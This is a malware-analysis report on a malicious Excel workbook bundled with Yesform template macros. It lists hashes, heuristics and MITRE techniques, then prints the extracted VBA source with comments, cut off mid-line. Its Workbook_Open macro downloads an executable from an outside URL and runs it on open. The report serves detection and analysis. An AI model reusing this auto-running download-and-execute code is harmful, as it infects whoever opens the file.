Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fb2517b4bb2ee6a5…

MALICIOUS

Office (OLE)

1.07 MB Created: 2008-06-05 06:01:16 Authoring application: Microsoft Excel First seen: 2019-11-20
MD5: 8153a4aed5a599160e80788de32d35b2 SHA-1: 7814df80c07628288623e57aa85163f5e0e659dd SHA-256: fb2517b4bb2ee6a539d0d0b20df38f8ebb0104a6518ce341e7782427f938d0fa
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The Workbook_Open macro in the VBA script executes a Shell command to download and run a second-stage executable from the URL http://www.yesform.com/active/searchMessenger/dw.php?mode=etc. This executable is saved to C:\sMessenger\searchMessenger_upgrade_x.exe. The macro also attempts to create the directory C:\sMessenger if it does not exist. The presence of the Shell() call and the download functionality strongly indicate a downloader or dropper malware.

Heuristics 6

  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.yesform.com/active/searchMessenger/dw.php?mode=etc In document text (OLE body)
    • http://www.yesform.com/z_n/forms/search.php?q=In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10166 bytes
SHA-256: 40c06ee803d83c9f072d0c1085c78a1325cf7289ebaf22456eea5e76dfb0c92f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Exported attribute header of the ThisWorkbook document module, as carved by
' olevba (see "Extracted artifacts" above). The Workbook_Open handler that
' follows lives in this module, which is why it runs automatically on open.
' Auto-executing entry point: Excel runs Workbook_Open when the file is opened
' (unless macros are blocked). If C:\sMessenger\searchMessenger.exe is absent
' (Dir returns "" for a missing file), it fetches a second-stage binary over
' plain HTTP and executes it. Note the guard checks searchMessenger.exe while the
' file written and launched is searchMessenger_upgrade_x.exe; unless the payload
' itself drops searchMessenger.exe (not verifiable from this listing), the
' download-and-run path would repeat on every open.
Private Sub Workbook_Open()
    If Dir("C:\sMessenger\searchMessenger.exe") = "" Then
        ' Download URL -> C:\sMessenger\searchMessenger_upgrade_x.exe (File_DownLoad below).
        File_DownLoad "http://www.yesform.com/active/searchMessenger/dw.php?mode=etc", "C:\sMessenger" & "\searchMessenger_upgrade_x.exe"
        ' Launch the dropped file. Detection angle: excel.exe spawning a child
        ' process from C:\sMessenger (T1204.002 / T1059.005 in the report).
        Shell "C:\sMessenger\searchMessenger_upgrade_x.exe"
    End If
End Sub

' Fetch SLocalFile (a URL, despite the name) with a synchronous MSXML2.XMLHTTP GET
' and write the raw response body to DLocalFile. Declared As Boolean but the return
' value is never assigned, so callers always receive False. There is no error
' handling: a failed request, an unchecked non-success HTTP status, or a disk write
' failure surfaces as a VBA runtime error.
Function File_DownLoad(ByVal SLocalFile As String, ByVal DLocalFile As String) As Boolean
    Dim oXMLHTTP As Object, DFile As Long, oResp() As Byte, FS As Object

    ' Late-bound COM objects via CreateObject (the OLE_VBA_CREATEOBJ finding above):
    ' HTTP client plus FileSystemObject for the folder check.
    Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP")
    Set FS = CreateObject("Scripting.FileSystemObject")
    ' Third argument False = synchronous request, so send does not return until the
    ' response is in; the ReadyState loop below is presumably redundant (4 = complete).
    oXMLHTTP.Open "GET", SLocalFile, False
    oXMLHTTP.send
    Do While oXMLHTTP.ReadyState <> 4
        DoEvents
    Loop

    ' Raw response bytes, written to disk without any status, size or content check.
    oResp = oXMLHTTP.responsebody

    ' Drop directory is hard-coded here (not derived from DLocalFile) and created if missing.
    If FS.FolderExists("C:\sMessenger") = False Then MkDir "C:\sMessenger"

    DFile = FreeFile
    ' Any existing file at the target path is deleted before the new write.
    If Dir(DLocalFile) <> "" Then Kill DLocalFile

    Open DLocalFile For Binary As #DFile
    Put #DFile, , oResp
    Close #DFile

    Set oXMLHTTP = Nothing
    Set FS = Nothing
End Function


Attribute VB_Name = "Module1"
' Dialog title used by the MsgBox calls in this module. Korean, roughly:
' "Korea's largest document-form site, Yesform (www.yesform.com)" — i.e. the
' legitimate template vendor's branding the downloader was bundled with.
Public Const Banner As String = "국내최대 문서서식 예스폼 (www.yesform.com)"
' Navigation helper: make Sheet1 the active sheet (benign template code).
Sub Move_Sheet1()
    Sheet1.Activate
End Sub
' Navigation helper: make Sheet2 the active sheet (benign template code).
Sub Move_Sheet2()
    Sheet2.Activate
End Sub
' Navigation helper: make Sheet4 the active sheet (benign template code; no Move_Sheet3 is defined).
Sub Move_Sheet4()
    Sheet4.Activate
End Sub
' Navigation helper: make Sheet5 the active sheet (benign template code).
Sub Move_Sheet5()
    Sheet5.Activate
End Sub
' Navigation helper: make Sheet6 the active sheet (benign template code).
Sub Move_Sheet6()
    Sheet6.Activate
End Sub

' "Protect sheet": applies Sheet_protect to the active sheet and confirms with a
' MsgBox (Korean: "Switched to sheet-protection mode."). Benign template code.
Sub 시트보호()
    Call Sheet_protect
    MsgBox "시트보호모드로 전환되었습니다.", vbInformation, Banner
End Sub

' "Unprotect sheet": asks a Yes/No question before calling Sheet_unprotect. The
' prompt (Korean) says the content is built for protected mode, that Yesform is not
' responsible for errors caused by edits after unprotecting, and asks whether to
' proceed. Benign template code.
Sub 시트해제()
    Dim Result As Integer
    
    Result = MsgBox("본 컨텐츠는 시트보호모드에서 정상적으로 사용할 수 있도록 구성되었습니다." & Chr(13) & "보호 해제 후 임의 수정에 따라 발생하는 컨텐츠 오류 및 손상에 대하여 예스폼(Yesform)이 책임지지 않음을 알려드립니다." & Chr(13) & "시트보호모드를 해제하시겠습니까?", vbYesNo, Banner)

    ' Only vbYes unprotects; the Else/Exit Sub branch is redundant since the Sub ends anyway.
    If Result = vbYes Then
        Call Sheet_unprotect
    Else
        Exit Sub
    End If
End Sub

' Show the print preview for the active sheet (benign template code).
Sub P_preview()
    ActiveSheet.PrintPreview
End Sub

' Send the active sheet to the printer (benign template code).
Sub P_out()
    ActiveSheet.PrintOut
End Sub

' Protect the active sheet while still allowing formatting, hyperlinks, sorting
' and filtering. NOTE(review): `Password = 1234` is an expression (comparison),
' not the named argument `Password:=1234`; with Password undeclared it evaluates
' to False and that is what is passed positionally, so the effective password is
' presumably not "1234". Sheet_unprotect repeats the same form, so the pair still
' matches each other — confirm in Excel before relying on the value.
Sub Sheet_protect()
    ActiveSheet.Protect Password = 1234, DrawingObjects:=True, Contents:=True, Scenarios:=True _
        , AllowFormattingCells:=True, AllowFormattingColumns:=True, _
        AllowFormattingRows:=True, AllowInsertingHyperlinks:=True, AllowSorting:= _
        True, AllowFiltering:=True
End Sub

' Remove protection from the active sheet. Uses the same `Password = 1234`
' comparison form as Sheet_protect (likely intended as `Password:=1234`), so
' whatever value that expression yields is consistent between the two.
Sub Sheet_unprotect()
    ActiveSheet.Unprotect Password = 1234
End Sub

' Toggle the row/column headings of the active window from the state of the
' form-control checkbox "Check Box 1" (Value 1 = checked). Benign template code.
Sub RowCol()
    If ActiveSheet.CheckBoxes("Check Box 1").Value = 1 Then
        ActiveWindow.DisplayHeadings = True
    Else
        ActiveWindow.DisplayHeadings = False
    End If
End Sub
Sub Approval_3()
    Dim RngA(6) As Range
    Dim Combo As DropDown
    
    Set RngA(1) = ActiveSheet.[b4] '시작
    Set RngA(2) = ActiveSheet.[aj5] '끝
    Set RngA(3) = ActiveSheet.[ag4] '1칸 시작
    Set RngA(4) = ActiveSheet.[ac4] '2간 시작
    Set RngA(5) = ActiveSheet.[y4] '3칸 시작
    Set RngA(6) = ActiveSheet.[u4] '4칸 시작
    
    Application.ScreenUpdating = False
    Application.DisplayAlerts = False '경고문구 무시
    Call Sheet_unprotect
    Range(RngA(1), RngA(2)).MergeCells = False
    With Range(RngA(6), RngA(2))
        .HorizontalAlignment = xlCenter
        .VerticalAlignment = xlCenter
        .Font.Bold = True
        .Font.Size = 9
        .Font.Name = "굴림체"
    End With
    
    Set Combo = ActiveSheet.DropDowns(1)
    Application.ScreenUpdating = False
    Select Case Combo.ListIndex
        Case 1 '결재란 없음
            Range(RngA(1), RngA(2)).MergeCells = True
        Case 2 '결재란 한개
            Range(RngA(1), RngA(3).Offset(1, -1)).MergeCells = True '앞에 병합(결재란 앞)
            Range(RngA(3), RngA(3).Offset(0, 3)).MergeCells = True '첫번째 결재란 위 병합
            Range(RngA(3).Offset(1), RngA(2)).MergeCells = True '첫번째 결재란 아래 병합
        Case 3 '결재란 두개
            Range(RngA(1)
... (truncated)